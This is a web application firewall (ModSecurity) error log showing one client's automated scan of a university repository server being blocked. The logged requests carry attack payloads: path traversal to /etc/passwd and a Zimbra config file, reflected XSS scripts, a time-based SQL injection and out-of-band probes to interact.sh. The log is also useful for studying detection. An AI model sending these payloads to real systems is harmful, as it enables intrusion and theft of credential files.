[tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO15e8Co-f0AAAlUlp4AAAA0"]
[Tue Aug 29 11:52:12.620401 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15fMCo-f0AAAnjjMQAAAAX"]
[Tue Aug 29 11:52:13.711203 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15fcCo-f0AAAjdQa8AAAAZ"]
[Tue Aug 29 11:52:13.716507 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/propertyfinder/component/jesectionfinder/"] [unique_id "ZO15fcCo-f0AAAlUlqQAAAA0"]
[Tue Aug 29 11:52:14.540948 2023] [:error] [pid 2536] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 3 / [28] [BANNER_AREA_FOOTER2] \\xd0\\x9f\\xd0\\xbe\\xd1\\x81\\xd0\\xb5\\xd1\\x82\\xd0\\xb8\\xd1\\x82\\xd0\\xb5 \\xd0\\xb2\\xd0\\xb2\\xd0\\xbe\\xd0\\xb4\\xd0\\xbd\\xd1\\x83\\xd1\\x8e \\xd0\\xb1\\xd0\\xb5\\xd1\\x81\\xd0\\xbf\\xd0\\xbb\\xd0\\xb0\\xd1\\x82\\xd0\\xbd\\xd1\\x83\\xd1\\x8e \\xd0\\xbb\\xd0\\xb5\\xd0\\xba\\xd1\\x86\\xd0\\xb8\\xd1\\x8e APTOS"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15fsCo-f0AAAnoOp4AAAAf"]
[Tue Aug 29 11:52:14.684308 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:1[3]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))-- found within ARGS:1[3]: or 'a'='a') and (select sleep(6))--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/api/v1/components"] [unique_id "ZO15fsCo-f0AAAn95-IAAAAD"]
[Tue Aug 29 11:52:14.766661 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/remotereporter/load_logfiles.php"] [unique_id "ZO15fsCo-f0AAAnn2BsAAAAe"]
[Tue Aug 29 11:52:15.569156 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 1 / [84] [MOBILE_HOME] Love Card"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15f8Co-f0AAAnkwgcAAAAY"]
[Tue Aug 29 11:52:16.620222 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 1 / [691] [NEW_INDEX_BANNERS] Trade-in football"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15gMCo-f0AAAnn2CAAAAAe"]
[Tue Aug 29 11:52:16.732492 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../../../../../../../../../../etc"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/download"] [unique_id "ZO15gMCo-f0AAAnHQiQAAAAT"]
[Tue Aug 29 11:52:17.743524 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15gcCo-f0AAAnd3FsAAAAI"]
[Tue Aug 29 11:52:17.828474 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ContactId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:ContactId: \\x22><script>alert(document.domain);</script><\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php"] [unique_id "ZO15gcCo-f0AAAnTlOIAAAAA"]
[Tue Aug 29 11:52:17.861432 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 5 / [129] [GARMIN_AKCII] Garmin \\xe1\\xee\\xed\\xf3\\xf1 \\xed\\xee\\xe2\\xee\\xf1\\xf2\\xfc \\xe2 \\xe0\\xea\\xf6\\xe8\\xe8"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15gcCo-f0AAAjdQb8AAAAZ"]
[Tue Aug 29 11:52:18.535655 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../../../../../../../../../../etc"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/laravel-filemanager/download"] [unique_id "ZO15gsCo-f0AAAnn2CkAAAAe"]
[Tue Aug 29 11:52:18.627031 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b found within ARGS:event1: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15gsCo-f0AAAnkwhQAAAAY"]
[Tue Aug 29 11:52:19.660058 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b found within ARGS:event1: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15g8Co-f0AAAni-BAAAAAU"]
[Tue Aug 29 11:52:21.221496 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:author: x\\x22 onmouseover=alert(document.domain) x="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15hcCo-f0AAAn0GdgAAAAa"]
[Tue Aug 29 11:52:21.951611 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: x\\x22 onmouseover=alert(document.domain) x=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/forum/index.php"] [unique_id "ZO15hcCo-f0AAAnkwiUAAAAY"]
[Tue Aug 29 11:52:23.594389 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://\\x22- found within ARGS:url: xss://\\x22-alert(document.domain)-\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/embed-swagger/swagger-iframe.php"] [unique_id "ZO15h8Co-f0AAAnkwioAAAAY"]
[Tue Aug 29 11:52:24.791153 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: 2Ue0JPPIf6oq1562KE1G556xZAu\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/templates/pages/debug_panel.php"] [unique_id "ZO15iMCo-f0AAAfWONUAAAAL"]
[Tue Aug 29 11:52:25.576764 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:skin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:skin: ../../../../../../../../../opt/zimbra/conf/localconfig.xml\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx TemplateMsg.js.zgz"] [unique_id "ZO15icCo-f0AAAn400wAAAAW"]
[Tue Aug 29 11:52:26.600262 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:skin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:skin: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx TemplateMsg.js.zgz"] [unique_id "ZO15isCo-f0AAAoLfFUAAAAG"]
[Tue Aug 29 11:52:26.607911 2023] [:error] [pid 2564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/admin/public/login.jsp"] [unique_id "ZO15isCo-f0AAAoEZOgAAAAB"]
[Tue Aug 29 11:52:26.620062 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:year. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:year: 2021</title><script>alert('2Ue0HK1NKDlhXaLCZfBctpGOJrj')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/cgi/cal"] [unique_id "ZO15isCo-f0AAAnTlPUAAAAA"]
[Tue Aug 29 11:52:26.659121 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:page: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php"] [unique_id "ZO15isCo-f0AAAnjjOgAAAAX"]
[Tue Aug 29 11:52:27.604469 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:author: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO15i8Co-f0AAAnTlPgAAAAA"]
[Tue Aug 29 11:52:27.611733 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/acs/..;/admin/public/login.jsp"] [unique_id "ZO15i8Co-f0AAAmNp7AAAAAQ"]
[Tue Aug 29 11:52:28.560720 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:color. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:color: \\x22><svg/onload=alert(document.domain)>\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/webmail/"] [unique_id "ZO15jMCo-f0AAAlUlr4AAAA0"]
[Tue Aug 29 11:52:28.687670 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:s: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO15jMCo-f0AAAmNp7UAAAAQ"]
[Tue Aug 29 11:52:29.844559 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:ij6fm"><script>alert(1337)</script>vg9q6c4g1mk. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:ij6fm\\x22><script>alert(1337)</script>vg9q6c4g1mk: ij6fm\\x22><script>alert(1337)</script>vg9q6c4g1mk"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/pmb/opac_css/index.php"] [unique_id "ZO15jcCo-f0AAAoLfFsAAAAG"]
[Tue Aug 29 11:52:30.616070 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ct_community. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:ct_community: <script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO15jsCo-f0AAAnTlQIAAAAA"]
